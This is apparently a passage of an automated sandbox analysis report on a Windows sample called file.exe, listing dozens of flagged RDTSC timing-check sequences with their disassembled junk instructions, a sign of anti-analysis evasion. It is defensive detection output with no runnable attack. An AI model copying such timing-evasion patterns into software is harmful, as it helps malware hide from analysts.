              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93ECFA second address: 93ED18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FE52CBFFE22h 0x0000000b jl 00007FE52CBFFE16h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93ED18 second address: 93ED1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D99E second address: 93D9B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE52CBFFE1Bh 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D9B4 second address: 93D9D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC95249h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D9D3 second address: 93D9FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE24h 0x00000007 pushad 0x00000008 jmp 00007FE52CBFFE1Ch 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93DB4E second address: 93DB76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE52CC95249h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jno 00007FE52CC95236h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93DCDD second address: 93DCE7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93DCE7 second address: 93DCEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D629 second address: 93D62D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D62D second address: 93D64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007FE52CC9523Eh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jnl 00007FE52CC95236h 0x00000016 push eax 0x00000017 push edx 0x00000018 je 00007FE52CC95236h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D64D second address: 93D651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E40C second address: 93E413 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E413 second address: 93E457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CBFFE27h 0x00000009 jmp 00007FE52CBFFE1Dh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007FE52CBFFE18h 0x00000019 jmp 00007FE52CBFFE1Fh 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E6F7 second address: 93E712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CC95247h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E9F0 second address: 93EA09 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE52CBFFE16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE52CBFFE1Dh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941500 second address: 94151F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE52CC95249h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94151F second address: 941525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941525 second address: 941556 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE52CC95236h 0x00000008 jmp 00007FE52CC9523Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE52CC95241h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941556 second address: 941560 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE52CBFFE16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941560 second address: 941571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC9523Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941571 second address: 941575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9416C1 second address: 9416C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9416C5 second address: 9416C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94198B second address: 941990 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943F27 second address: 943F47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE26h 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FE52CBFFE16h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 948429 second address: 94843D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE52CC9523Bh 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94843D second address: 948457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE52CBFFE1Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CE25 second address: 94CE29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94CE29 second address: 94CE2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94C509 second address: 94C515 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE52CC9523Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94C515 second address: 94C541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jg 00007FE52CBFFE16h 0x0000000b jne 00007FE52CBFFE16h 0x00000011 push edx 0x00000012 pop edx 0x00000013 jp 00007FE52CBFFE16h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jnc 00007FE52CBFFE1Eh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94C6D8 second address: 94C6E0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94CB4B second address: 94CB5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007FE52CBFFE16h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95297E second address: 95299A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE52CC95236h 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 jp 00007FE52CC95236h 0x00000018 pop eax 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9516CA second address: 9516CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F6B75 second address: 8F6BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 ja 00007FE52CC95240h 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D34B0h], esi 0x00000014 mov ebx, dword ptr [ebp+12489C48h] 0x0000001a jnl 00007FE52CC95242h 0x00000020 add eax, ebx 0x00000022 call 00007FE52CC9523Fh 0x00000027 jmp 00007FE52CC9523Fh 0x0000002c pop edx 0x0000002d mov edi, dword ptr [ebp+122D3B86h] 0x00000033 push eax 0x00000034 jc 00007FE52CC95244h 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d pop eax 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F6BDD second address: 8F6BE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951AEB second address: 951AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951AEF second address: 951B12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE23h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e jc 00007FE52CBFFE16h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951B12 second address: 951B2D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE52CC9523Ch 0x00000008 jc 00007FE52CC95236h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jl 00007FE52CC95236h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951B2D second address: 951B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007FE52CBFFE1Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951B3C second address: 951B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951B40 second address: 951B58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edx 0x00000006 pop edx 0x00000007 jbe 00007FE52CBFFE16h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007FE52CBFFE16h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951B58 second address: 951B62 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE52CC95236h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95806B second address: 958072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 958072 second address: 958078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 958858 second address: 95886E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007FE52CBFFE1Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95886E second address: 958882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b jnp 00007FE52CC95236h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959371 second address: 959385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959385 second address: 95938B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95938B second address: 959391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959391 second address: 959395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95968F second address: 959694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959BF2 second address: 959BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A6CB0 second address: 8A6CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007FE52CBFFE29h 0x0000000c jmp 00007FE52CBFFE29h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007FE52CBFFE1Ch 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A6CF8 second address: 8A6D00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A6D00 second address: 8A6D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A6D04 second address: 8A6D14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC9523Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 962B4F second address: 962B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE52CBFFE1Eh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 962B66 second address: 962B77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 js 00007FE52CC95236h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 962CD0 second address: 962D06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FE52CBFFE18h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE52CBFFE28h 0x00000016 ja 00007FE52CBFFE16h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 962D06 second address: 962D0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 962D0C second address: 962D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jbe 00007FE52CBFFE2Ch 0x0000000e jmp 00007FE52CBFFE20h 0x00000013 jl 00007FE52CBFFE16h 0x00000019 jmp 00007FE52CBFFE21h 0x0000001e push ecx 0x0000001f push esi 0x00000020 pop esi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 962E78 second address: 962E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 je 00007FE52CC95236h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 963148 second address: 96318E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FE52CBFFE24h 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 jmp 00007FE52CBFFE1Eh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 963485 second address: 9634B1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE52CC95236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FE52CC9524Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96A2B0 second address: 96A2C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE52CBFFE1Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96A9D0 second address: 96A9DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jno 00007FE52CC95236h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96A9DF second address: 96A9EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE52CBFFE16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96AEF3 second address: 96AF07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC9523Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 969C89 second address: 969C9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE1Ah 0x00000007 ja 00007FE52CBFFE16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 989122 second address: 989126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 988CB1 second address: 988CCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FE52CBFFE16h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 988CCE second address: 988CDD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE52CC95236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 988CDD second address: 988CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 988E2C second address: 988E30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 988E30 second address: 988E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE52CBFFE26h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 988E53 second address: 988E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jp 00007FE52CC95245h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98E7E6 second address: 98E7F8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE52CBFFE1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 995FC4 second address: 995FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 995FC8 second address: 995FCE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 995FCE second address: 995FDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jl 00007FE52CC95236h 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 995FDC second address: 995FEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE52CBFFE1Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 995FEE second address: 995FF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 995FF2 second address: 996000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99E337 second address: 99E359 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE52CC95236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE52CC95240h 0x00000011 jg 00007FE52CC95236h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99E359 second address: 99E378 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE52CBFFE1Ah 0x0000000b jnc 00007FE52CBFFE18h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99E378 second address: 99E38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 je 00007FE52CC95236h 0x0000000e pop edi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99D114 second address: 99D11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99D11A second address: 99D12E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007FE52CC95236h 0x0000000c jno 00007FE52CC95236h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99D12E second address: 99D16F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FE52CBFFE28h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE52CBFFE23h 0x00000013 push edx 0x00000014 ja 00007FE52CBFFE16h 0x0000001a jne 00007FE52CBFFE16h 0x00000020 pop edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99D16F second address: 99D174 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99D400 second address: 99D40A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FE52CBFFE16h 0x0000000a rdtsc
